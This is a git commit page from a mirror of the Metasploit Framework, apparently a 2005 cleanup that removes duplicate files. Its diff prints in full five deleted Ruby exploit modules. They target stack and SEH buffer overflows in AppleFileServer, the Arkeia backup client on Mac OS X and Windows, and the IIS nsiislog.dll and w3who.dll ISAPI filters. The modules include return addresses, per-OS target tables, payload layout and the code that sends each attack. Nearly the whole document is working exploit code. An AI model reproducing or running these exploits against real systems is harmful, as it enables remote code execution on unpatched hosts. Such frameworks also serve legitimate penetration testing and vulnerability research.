infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Removing dupes 

git-svn-id: file:///home/svn/incoming/trunk@3255 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-12-26 14:36:25 +00:00
parent 97129d0303
commit 53a49f55d4
5 changed files with 0 additions and 500 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

88
modules/exploits/osx/afp/afp_loginext.rb
View File

@ -1,88 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'AppleFileServer LoginExt PathName Overflow',
'Description' => %q{
This module exploits a stack overflow in the AppleFileServer service
on MacOS X. This vulnerability was originally reported by Atstake and
was actually one of the few useful advisories ever published by that
company. You only have one chance to exploit this bug.
This particular exploit uses a stack-based return address that will
only work under optimal conditions.
},
'Author' => 'hdm',
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '5762' ],
[ 'MIL', '2' ],
],
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x20",
'MinNops' => 128,
'Compat' =>
{
'ConnectionType' => "+find"
}
},
'Targets' =>
[
# Target 0
[
'Mac OS X 10.3.3',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Ret' => 0xf0101c0c # stack address :<
},
],
],
'DisclosureDate' => 'May 3 2004'))
# Configure the default port to be AFP
register_options(
[
Opt::RPORT(548),
], self.class)
end
def exploit
connect
print_status("Trying target #{target.name}...")
path = "\xff" * 1024
path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret)
path[172, payload.encoded.length] = payload.encoded
# The AFP header
afp = "\x3f\x00\x00\x00"
# Add the authentication methods
["AFP3.1", "Cleartxt Passwrd"].each { |m|
afp << [m.length].pack('C') + m
}
# Add the user type and afp path
afp << "\x03" + [9].pack('n') + Rex::Text.rand_text_alphanumeric(9)
afp << "\x03" + [path.length].pack('n') + path
sock.write(afp)
handler
disconnect
end
end
end

105
modules/exploits/osx/arkeia/arkeia_type77_macos.rb
View File

@ -1,105 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Osx::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
include Exploit::Remote::Arkeia
def initialize(info = {})
super(update_info(info,
'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',
'Description' => %q{
This module exploits a stack overflow in the Arkeia backup
client for the Mac OS X platform. This vulnerability affects
all versions up to and including 5.3.3 and has been tested
with Arkeia 5.3.1 on Mac OS X 10.3.5.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '14011'],
[ 'BID', '12594'],
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
[ 'MIL', '6'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'MinNops' => 700,
},
'Targets' =>
[
[
'Arkeia 5.3.1 Stack Return (boot)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
'Ret' => 0xbffff910,
},
],
],
'DisclosureDate' => 'Feb 18 2005',
'DefaultTarget' => 0))
end
def check
info = arkeia_info()
if(not (info and info['Version']))
return Exploit::CheckCode::Safe
end
print_status("Arkeia Server Information:")
info.each_pair { |k,v|
print_status(" #{k + (" " * (30-k.length))} = #{v}")
}
if (info['System'] !~ /Darwin/)
print_status("This module only supports Mac OS X targets")
return Exploit::CheckCode::Detected
end
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
# Request has to be big enough to find and small enough
# not to write off the end of the stack. If we write too
# far down, we also smash env[], which causes a crash in
# getenv() before our function returns.
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
buf = Rex::Text.rand_text_english(1200, payload_badchars)
# Return back to the stack either directly or via system lib
buf[0, 112] = [target.ret].pack('N') * (112/4)
# Huge nop slep followed by the payload
buf[112, payload.encoded.length] = payload.encoded
head[6, 2] = [buf.length].pack('n')
begin
sock.put(head)
sock.put(buf)
sock.get_once
rescue IOError, EOFError => e
print_status("Exception: #{e.class}:#{e.to_s}")
end
handler
disconnect
end
end
end

117
modules/exploits/windows/arkeia/arkeia_type77_win32.rb
View File

@ -1,117 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::Arkeia::ArkeiaType77Overflow < Msf::Exploit::Remote
include Exploit::Remote::Arkeia
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',
'Description' => %q{
This module exploits a stack overflow in the Arkeia backup
client for the Windows platform. This vulnerability affects
all versions up to and including 5.3.3.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '14011'],
[ 'BID', '12594'],
[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],
[ 'MIL', '7'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe
['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe
['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe
['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe
['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll
['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll
['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll
['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll
['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll
['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll
['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll
],
'DisclosureDate' => 'Feb 18 2005',
'DefaultTarget' => 0))
end
def check
info = arkeia_info()
if(not (info and info['Version']))
return Exploit::CheckCode::Safe
end
print_status("Arkeia Server Information:")
info.each_pair { |k,v|
print_status(" #{k + (" " * (30-k.length))} = #{v}")
}
if (info['System'] !~ /Windows/)
print_status("This module only supports Windows targets")
return Exploit::CheckCode::Detected
end
if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
head[6, 2] = [data.length].pack('n')
begin
sock.put(head)
sock.put(data)
sock.get_once
rescue IOError, EOFError => e
print_status("Exception: #{e.class}:#{e.to_s}")
end
handler
disconnect
end
def prep_ark5
data = Rex::Text.rand_text_english(4096, payload_badchars)
data[1176, 4] = [target['Rets'][0]].pack('V')
data[1172, 2] = "\xeb\xf9"
data[1167, 5] = "\xe98" + [-1172].pack('V')
data[0, payload.encoded.length] = payload.encoded
end
def prep_ark4
data = Rex::Text.rand_text_english(4096, payload_badchars)
seh = generate_seh_payload( target['Rets'][0] )
data[ 96, seh.length] = seh
end
end
end

101
modules/exploits/windows/isapi/iis_nsiislog_post.rb
View File

@ -1,101 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
include Exploit::Remote::BruteTargets
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'IIS nsiislog.dll ISAPI POST Overflow',
'Description' => %q{
This exploits a buffer overflow found in the nsiislog.dll
ISAPI filter that comes with Windows Media Server. This
module will also work against the 'patched' MS03-019
version. This vulnerability was addressed by MS03-022.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '4535'],
[ 'MSB', 'MS03-022'],
[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
[ 'MIL', '30'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
},
'Platform' => 'win',
'Targets' =>
[
['Brute Force', { }],
['Windows 2000 -MS03-019', { 'Rets' => [ 9769, 0x40f01333 ] }],
['Windows 2000 +MS03-019', { 'Rets' => [ 13869, 0x40f01353 ] }],
['Windows XP -MS03-019', { 'Rets' => [ 9773, 0x40f011e0 ] }],
],
'DisclosureDate' => 'Jun 25 2003',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
], self)
end
def check
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
if (res and res.body =~ /NetShow ISAPI/)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit_target(target)
c = connect
buf = ''
%w{
date time c-dns cs-uri-stem c-starttime
x-duration c-rate c-status c-playerid c-playerversion
c-playerlanguage cs(User-Agent) cs(Referer) c-hostexe
}.each do |field|
buf << field + '=' + 'BOOM&'
end
pat = 'O' * 65535
seh = generate_seh_payload(target['Rets'][1])
pat[ target['Rets'][0] - 4, seh.length] = seh
buf << pat
req = c.request({
'uri' => datastore['URL'],
'method' => 'POST',
'user-agent' => 'NSPlayer/2.0',
'content-type' => 'application/x-www-form-urlencoded',
'data' => buf,
})
print_status("Sending request...")
c.send_request(req, 0)
handler
disconnect
end
end
end

89
modules/exploits/windows/isapi/iis_w3who_overflow.rb
View File

@ -1,89 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
include Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'IIS w3who.dll ISAPI Overflow',
'Description' => %q{
This module exploits a stack overflow in the w3who.dll ISAPI
application. This vulnerability was discovered Nicolas
Gregoire and this code has been successfully tested against
Windows 2000 and Windows XP (SP2). When exploiting Windows
XP, the payload must call RevertToSelf before it will be
able to spawn a command shell.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '12258'],
[ 'CVE', '2004-1134'],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
[ 'MIL', '32'],
[ 'BID', '11820'],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 632,
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
'MinNops' => 128,
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
],
'DisclosureDate' => 'Dec 6 2004'))
register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self)
end
def check
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
c = connect
buf = Rex::Text.rand_text_english(8192, payload_badchars)
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
url = datastore['URL'] + '?' + buf
req = c.request({ 'uri' => url })
print_status("Sending request...")
c.send_request(req, 0)
handler
disconnect
end
end
end